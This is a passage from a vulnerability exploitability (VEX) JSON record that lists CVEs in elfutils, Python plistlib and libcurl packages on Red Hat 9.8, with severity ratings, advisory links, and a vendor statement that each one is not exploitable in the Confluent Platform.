          "url": "https://vuldb.com/?id.295984"
        },
        {
          "url": "https://vuldb.com/?submit.497538"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:09+00:00",
      "updated": "2026-06-17T08:39:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1377",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability, which was classified as problematic, has been found in GNU elfutils 0.192. This issue affects the function gelf_getsymshndx of the file strip.c of the component eu-strip. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of the patch is fbf1df9ca286de3323ae541973b08449f8d03aba. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1377"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1377"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1377"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15941"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32673#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295985"
        },
        {
          "url": "https://vuldb.com/?id.295985"
        },
        {
          "url": "https://vuldb.com/?submit.497539"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:10+00:00",
      "updated": "2026-06-17T08:39:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13837",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "When loading a plist file, the plistlib module reads data in size specified by the file itself, meaning a malicious file can cause OOM and DoS issues",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13837"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13837"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/568342cfc8f002d9a15f30238f26b9d2e0e79036"
        },
        {
          "url": "https://github.com/python/cpython/commit/5a8b19677d818fb41ee55f310233772e15aa1a2b"
        },
        {
          "url": "https://github.com/python/cpython/commit/694922cf40aa3a28f898b5f5ee08b71b4922df70"
        },
        {
          "url": "https://github.com/python/cpython/commit/71fa8eb8233b37f16c88b6e3e583b461b205d1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/b64441e4852383645af5b435411a6f849dd1b4cb"
        },
        {
          "url": "https://github.com/python/cpython/commit/cefee7d118a26ef6cd43db59bb9d98ca9a331111"
        },
        {
          "url": "https://github.com/python/cpython/issues/119342"
        },
        {
          "url": "https://github.com/python/cpython/pull/119343"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-13837.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2X5IBCJXRQAZ5PSERLHMSJFBHFR3QM2C/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13837"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13837"
        }
      ],
      "published": "2025-12-01T18:16:04+00:00",
      "updated": "2026-06-17T08:34:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14017",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,\nchanging TLS options in one thread would inadvertently change them globally\nand therefore possibly also affect other concurrently setup transfers.\n\nDisabling certificate verification for a specific transfer could\nunintentionally disable the feature for other threads as well.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14017"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14017"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14017.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-jh4h-2cg6-889h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14017"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:35:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
